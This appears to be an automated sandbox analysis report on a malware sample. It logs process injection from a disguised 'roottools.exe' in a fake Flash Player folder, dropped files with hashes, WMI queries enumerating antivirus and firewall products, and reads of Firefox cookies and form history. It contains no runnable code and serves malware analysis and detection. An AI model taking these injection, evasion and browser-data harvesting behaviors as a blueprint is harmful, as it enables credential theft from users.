private_0x00000000025e0000	0x025e0000	0x0261ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002620000	0x02620000	0x0265ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002690000	0x02690000	0x026cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000026d0000	0x026d0000	0x0270ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002760000	0x02760000	0x0279ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000027a0000	0x027a0000	0x027dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000027e0000	0x027e0000	0x0281ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002820000	0x02820000	0x028dffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002840000	0x02840000	0x0287ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000028a0000	0x028a0000	0x028dffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000028e0000	0x028e0000	0x0291ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002940000	0x02940000	0x0297ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002990000	0x02990000	0x029cffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000029d0000	0x029d0000	0x02acffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002ad0000	0x02ad0000	0x02b0ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002b70000	0x02b70000	0x02baffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002bc0000	0x02bc0000	0x02bfffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002c00000	0x02c00000	0x02c3ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002c70000	0x02c70000	0x02caffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002cb0000	0x02cb0000	0x02dbffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002dc0000	0x02dc0000	0x02ecffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002de0000	0x02de0000	0x02e1ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002ec0000	0x02ec0000	0x02ecffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002ed0000	0x02ed0000	0x0308ffff	Private Memory	Readable, Writable	Region Actions
wow64cpu.dll	0x743d0000	0x743d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x743e0000	0x7443bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74440000	0x7447efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wshtcpip.dll	0x75270000	0x75274fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winrnr.dll	0x75280000	0x75287fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mswsock.dll	0x75290000	0x752cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pnrpnsp.dll	0x752d0000	0x752e1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
napinsp.dll	0x752f0000	0x752fffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nlaapi.dll	0x75300000	0x7530ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasadhlp.dll	0x75310000	0x75315fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sensapi.dll	0x75320000	0x75325fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasman.dll	0x75330000	0x75344fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasapi32.dll	0x75350000	0x753a1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
schannel.dll	0x753b0000	0x753e9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x753f0000	0x75406fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dnsapi.dll	0x75410000	0x75453fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x75460000	0x75480fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x75490000	0x7562dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x75630000	0x7566afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x75670000	0x75685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x75690000	0x75697fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rtutils.dll	0x756a0000	0x756acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x756b0000	0x756cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x756d0000	0x756dafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x756e0000	0x756e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75800000	0x7580bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75810000	0x7586ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x758c0000	0x759bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759c0000	0x75acffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x75ad0000	0x75ad4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75ae0000	0x75c3bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75c40000	0x75e3afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75e70000	0x75f1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75f20000	0x76014fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x760b0000	0x7610ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76110000	0x761acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x761b0000	0x7623efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x76240000	0x7635cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x76360000	0x7636bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76370000	0x763c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76570000	0x7663bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x76640000	0x76685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76690000	0x767c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x767d0000	0x767e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x767f0000	0x767f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76800000	0x768effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x768f0000	0x768f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x76900000	0x76944fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76950000	0x769dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wintrust.dll	0x76a40000	0x76a6cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x76a70000	0x776b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x77740000	0x777dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x777e0000	0x77814fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000778b0000	0x778b0000	0x779a9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000779b0000	0x779b0000	0x77acefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77ad0000	0x77c78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77cb0000	0x77e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007ef92000	0x7ef92000	0x7ef94fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef95000	0x7ef95000	0x7ef97fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef98000	0x7ef98000	0x7ef9afff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef9b000	0x7ef9b000	0x7ef9dfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef9e000	0x7ef9e000	0x7efa0fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa1000	0x7efa1000	0x7efa3fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions
For performance reasons, the remaining 126 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x7b4	address = 0x70000, size = 114688	1	Fn Data
Modify Memory	#22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x7b4	address = 0x876c4, size = 4	1	Fn Data
Modify Memory	#22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x7b4	address = 0x877d0, size = 4	1	Fn Data
Modify Memory	#22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x7b4	address = 0x87d38, size = 4	1	Fn Data
Create Remote Thread	#22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x7b4	address = 0x795bc	1	Fn

Created Files

Filename	File Size	Hash Values	Actions
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabaed4.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\taraed5.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\coob07b.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\flab08c.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabb08d.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabb08e.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabb08f.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabb090.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabb091.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabb092.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabb0a3.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabb0a4.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabb0a5.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabb0a6.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\sofb0d5.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cabaed4.tmp	52.71 KB (53978 bytes)	MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\taraed5.tmp	126.77 KB (129813 bytes)	MD5: 4479a52b31b6bde89384fb63854ec382 SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2	File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\sjpf7mow3gfda.tmp	0.17 KB (171 bytes)	MD5: 1142692290abc4073f6cb4f996e782fa SHA1: d71b914d853ef1017dda3d6a0cbd29127aac5730 SHA256: 6c75444d6330e8c0c49f14bb9cb9c55b176820f769378554b9af13fce7115cba	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\hxqoq[1].txt	0.19 KB (192 bytes)	MD5: 23e04d8ef7cca29b1eeff7fa22c0c8e0 SHA1: 6af5fc031b6f31cef4e14b7056ea07441a79fbe9 SHA256: 73794646c8afa7e919476ff8095e4f5f2dd0caa3dfb7badc8620eb36b81c6307	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\eha[1].txt	0.19 KB (192 bytes)	MD5: 948a64299b0f13ef15d1534c929c8908 SHA1: 707d2546cb7e3d6ef30084fa817b068ba299b48d SHA256: a84e628a54c5000e94bf8026a5ccdd062d100a5c9f22827548b8eab8d745503c	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\2pg[1].txt	0.19 KB (192 bytes)	MD5: 082e064c3b994a31dc76874b48a6033d SHA1: 5df5d513919f2c5373e46f4274c0ca043ec2d074 SHA256: 9a22b3e989be91a1ea151037471a153ef989117bb1215488e7e7c62f78c3424d	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\syrtq[1].txt	0.19 KB (192 bytes)	MD5: 80fa0fcd69c77d3f984d712e6741c5b6 SHA1: a4a473c7457f6ef5ac8b037096151ee812c0547d SHA256: c8f0e774f0ee04169b6dcb3c97df5b1c99325406fddd9afbe2039bbe0eebe74a	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\tcmu_zldnrsala[1].txt	0.09 KB (88 bytes)	MD5: 105ef3c8c5656d44bb9c7221446103cc SHA1: 0a1aa89639d01e9ab3a76b0bc22911ec5033bc17 SHA256: bc9e231394912761cdff92d2ba0ccfe6ed8427198c17eb3e65b23e62d8c8d962	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dfa[1].txt	0.19 KB (192 bytes)	MD5: 6928ee150e77b6e370de79ff6ba859e2 SHA1: e200706435642973086f3659903ddcabf59d894f SHA256: f0e4ff028c7f7c9a09ea8b29458ef9269108598cbdba2a50f384e6af67819c96	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\coob07b.tmp	12.41 KB (12707 bytes)	MD5: 60492a553dc3492eaea00299b9976477 SHA1: 296392a97cf91096c931293099654ac50dae95f3 SHA256: 8491814b3ee58612f1ce1d20022263ae3817af78a69f03b1af5b5e299591f6a4	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\cabb08d.tmp	0.20 KB (207 bytes)	MD5: c8c975ff6c535bb9e0d34a332b334e8f SHA1: 5bcbf5c63be57bb1512270a904424352081ab0ba SHA256: 863a31200bc0cdd3ea7ee31ab2f086e67ac5ca67c561ce925c7bf2f87dbf16fe	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\cabb08e.tmp	0.07 KB (68 bytes)	MD5: 7f420b843841e2e85c7a9c66d0d02fa4 SHA1: 387c6e4328f6f441e32191f35f24bca95844ba69 SHA256: 511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\cabb090.tmp	0.07 KB (68 bytes)	MD5: 7f420b843841e2e85c7a9c66d0d02fa4 SHA1: 387c6e4328f6f441e32191f35f24bca95844ba69 SHA256: 511b67c07421771241e83e343fe792ae7358162fbf161b8ba23fe1ef51fd0d8c	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\flab08c.tmp	0.31 KB (319 bytes)	MD5: 8f44eaade8a98a128f71e04667af8328 SHA1: 36ed9ceced094ab5345b34dc008176132de28716 SHA256: 1a367605ecf4ec581f19dfadb122ca1fdc37b47cd311e1fabd53cb12964254ba	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\cabb08f.tmp	0.20 KB (207 bytes)	MD5: 497bb917bc24b0023d281c2fc2c236af SHA1: 1c86d43980e988bfcabf57104b2101024696c184 SHA256: a75138a5451d7dbadddf6e4eb27dd6b3fccaf85b3e2af1af4f476d338a55dc2a	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\cabb091.tmp	0.01 KB (8 bytes)	MD5: 7b5b6c7bf41e6055abd4e74476e08575 SHA1: 5c05d3a68f69258d236f6d9677cc0a42e399e7cc SHA256: 2392619f397925a165cf31634781d68b006c396611c425f6c67f338356e47f8f	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\sofb0d5.tmp	1.05 KB (1072 bytes)	MD5: aac3de092af58ca64dab1cc4b2186c5e SHA1: 084512759ab2be3358f3bd1c3c4ef2f88871d01f SHA256: 12ee0606b5290d5d363395ffc82a87b3ac1257cbab1a4a5179eeaafac1638bf6	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qrq[1].txt	391.61 KB (401004 bytes)	MD5: f6e12d2f070ce6a5936fbed778034d4e SHA1: 23f94e36ddf66ba3e25236ecc83d63fefea9dd77 SHA256: 1716764c1a99963323a4aa287ff8afe97385d4006ae778882ce7597336fa78b0	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ymg[1].txt	487.84 KB (499544 bytes)	MD5: 3e7b96a26127f8bbe978d5ec0ab2183c SHA1: 707584fae1eee0b149da3e3d4c520b510ec6128b SHA256: 8153879cf65226d01cfbc3962edde75fcd3da186adb1d73c3be1b5908517fd26	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\auniq[1].txt	20.77 KB (21272 bytes)	MD5: dc4ceb44d8bb1310e487d691de717647 SHA1: 6fb5662a14a79f7908b673bce6f5f44cb02b6cf1 SHA256: 8f648992dce9dc56dfab5cfadfa7aafd1c1329c2f2f47411fc941effe765a48d	File Actions Show Properties Download

Host Behavior

COM (19)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	WBEMLocator	IWbemLocator	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD, CLSCTX_NO_FAILURE_LOG	6	Fn
Create	3C374A40-BAE4-11CF-BF7D-00AA006946EE	AFA0DC11-C313-11D0-831A-00C04FD5AE38	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = ROOT\SecurityCenter	1	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = Select * from AntiVirusProduct	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = ROOT\SecurityCenter2	3	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = Select * from AntiVirusProduct	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = ROOT\SecurityCenter	2	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = Select * from AntiSpywareProduct	2	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = Select * from FirewallProduct	2	Fn

File (1783)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite	desired_access = FILE_READ_ATTRIBUTES	2	Fn
